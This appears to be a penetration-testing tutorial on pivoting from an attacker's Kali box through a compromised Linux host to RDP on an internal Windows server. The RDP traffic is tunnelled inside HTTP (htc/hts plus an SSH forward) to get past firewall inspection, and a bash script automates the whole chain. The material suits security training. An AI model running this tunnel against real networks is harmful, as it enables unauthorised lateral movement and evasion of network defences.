Scenario
Goal
RDP over HTTP from Kali to a Windows Server in the internal network using HTTPTunnel (htc on the attacker side, hts on the compromised host).
What we already have or know:
- A fully compromised Linux machine connected to the internal network
- The Linux shell is HTTP-based (port 443)
- The firewall only allows inbound traffic to the Linux machine on ports 80, 443 and 1234
- No service is listening on port 1234 on the Linux machine, so hts can bind it
- Hosts
- Kali (attacker machine)
- Linux (compromised server): 10.11.0.123
- Windows (target in the internal network): 192.168.1.11
Execution
- Establish an HTTP-based tunnel from Kali 8080 to Linux 1234. Everything crossing the firewall on 1234 is wrapped in ordinary HTTP requests, so inspection of that port sees HTTP rather than RDP.
- On Kali:
htc --forward-port 8080 10.11.0.123:1234
--forward-port
here specifies the local port htc listens on (8080 on Kali); the last argument is the hts endpoint on the Linux machine.
- Decapsulate the HTTP tunnel traffic arriving on Linux 1234 and hand the raw stream to Linux 8888 (the RDP client and server speak plain TCP, not HTTP)
- On Linux:
hts --forward-port localhost:8888 1234
--forward-port
here specifies where hts sends the decapsulated traffic (localhost:8888); the trailing 1234 is the port hts listens on. hts opens the connection to 8888 only when a client arrives, so whatever listens on 8888 must be up before the first htc connection.
- Establish an SSH local port forward from Linux 8888 to Windows 3389 (RDP). This assumes SSH login as a local account on the Linux machine; the host-key options are acceptable here only because the connection is to localhost.
- On Linux:
ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -NfL 0.0.0.0:8888:192.168.1.11:3389 user@localhost
Binding 0.0.0.0:8888 exposes the forward to anything that can reach the Linux machine; since hts connects to localhost, binding 127.0.0.1:8888 is sufficient and safer. Start this forward before hts, then htc on Kali, and finally point the RDP client on Kali at 127.0.0.1:8080.
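The three hops above, driven from one script, as an added example (not from the original page). It keeps the page's hosts and ports, checks that each hop's destination port matches the next hop's listen port before anything is started, and enforces the start order (ssh forward, then hts, then htc). The SSH user name, the TUNNEL_SIDE switch, the /dev/tcp readiness probe (bash-specific) and the xfreerdp client invocation are assumptions.

```bash
#!/usr/bin/env bash
# Added example, not the original page's code.
# Chain: Kali:8080 -(htc, HTTP)-> Linux:1234 -(hts)-> Linux:8888 -(ssh -L)-> Windows:3389
set -u

LINUX_IP="${LINUX_IP:-10.11.0.123}"       # compromised Linux machine (page)
WINDOWS_IP="${WINDOWS_IP:-192.168.1.11}"  # RDP target (page)
SSH_USER="${SSH_USER:-user}"              # assumption: local account on the Linux machine

KALI_LISTEN=8080    # htc listens here on Kali
HTC_DST_PORT=1234   # htc connects to this port on Linux
HTS_LISTEN_PORT=1234 # hts binds this (allowed inbound, otherwise unused)
HTS_FWD_PORT=8888   # hts hands decapsulated bytes to localhost:this
SSH_BIND_PORT=8888  # ssh -L binds this and forwards to Windows RDP
RDP_PORT=3389

# A port mismatch between hops is the usual reason "the tunnel is up but
# nothing connects". Returns 0 when the chain lines up, 1 otherwise.
check_chain() {
  htc_dst="$1"; hts_listen="$2"; hts_fwd="$3"; ssh_bind="$4"
  if [ "$htc_dst" != "$hts_listen" ]; then
    echo "htc targets port $htc_dst but hts listens on $hts_listen" >&2; return 1
  fi
  if [ "$hts_fwd" != "$ssh_bind" ]; then
    echo "hts forwards to port $hts_fwd but ssh -L binds $ssh_bind" >&2; return 1
  fi
  return 0
}

# Command lines for each hop, assembled from the variables above.
htc_cmd() { printf 'htc --forward-port %s %s:%s' "$KALI_LISTEN" "$LINUX_IP" "$HTC_DST_PORT"; }
hts_cmd() { printf 'hts --forward-port localhost:%s %s' "$HTS_FWD_PORT" "$HTS_LISTEN_PORT"; }
ssh_cmd() {
  # 127.0.0.1 rather than the page's 0.0.0.0: hts connects locally, so nothing else needs the port.
  printf 'ssh -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -NfL 127.0.0.1:%s:%s:%s %s@localhost' \
    "$SSH_BIND_PORT" "$WINDOWS_IP" "$RDP_PORT" "$SSH_USER"
}
rdp_cmd() { printf 'xfreerdp /v:127.0.0.1:%s' "$KALI_LISTEN"; }  # assumption: xfreerdp as RDP client

# Poll a TCP port with bash's /dev/tcp until something accepts, or give up.
wait_for_port() {
  host="$1"; port="$2"; tries="${3:-10}"
  while [ "$tries" -gt 0 ]; do
    (exec 3<>"/dev/tcp/$host/$port") 2>/dev/null && return 0
    tries=$((tries - 1)); sleep 1
  done
  return 1
}

# hts only connects to 8888 when a client arrives, so the ssh forward must
# already be listening; start ssh, then hts. htc on Kali comes last.
start_linux_side() {
  check_chain "$HTC_DST_PORT" "$HTS_LISTEN_PORT" "$HTS_FWD_PORT" "$SSH_BIND_PORT" || return 1
  eval "$(ssh_cmd)"
  wait_for_port 127.0.0.1 "$SSH_BIND_PORT" || { echo "ssh forward never came up" >&2; return 1; }
  eval "$(hts_cmd)"
  wait_for_port 127.0.0.1 "$HTS_LISTEN_PORT" || { echo "hts never came up" >&2; return 1; }
}
start_kali_side() {
  eval "$(htc_cmd)"
  wait_for_port 127.0.0.1 "$KALI_LISTEN" || { echo "htc never came up" >&2; return 1; }
  echo "tunnel ready, now run: $(rdp_cmd)"
}

# Nothing starts unless asked, so the file can also be sourced for its functions.
case "${TUNNEL_SIDE:-}" in
  linux) start_linux_side ;;
  kali)  start_kali_side ;;
esac
```

Run it as TUNNEL_SIDE=linux on the compromised machine first and TUNNEL_SIDE=kali on the attacker box afterwards; with TUNNEL_SIDE unset it only defines the functions.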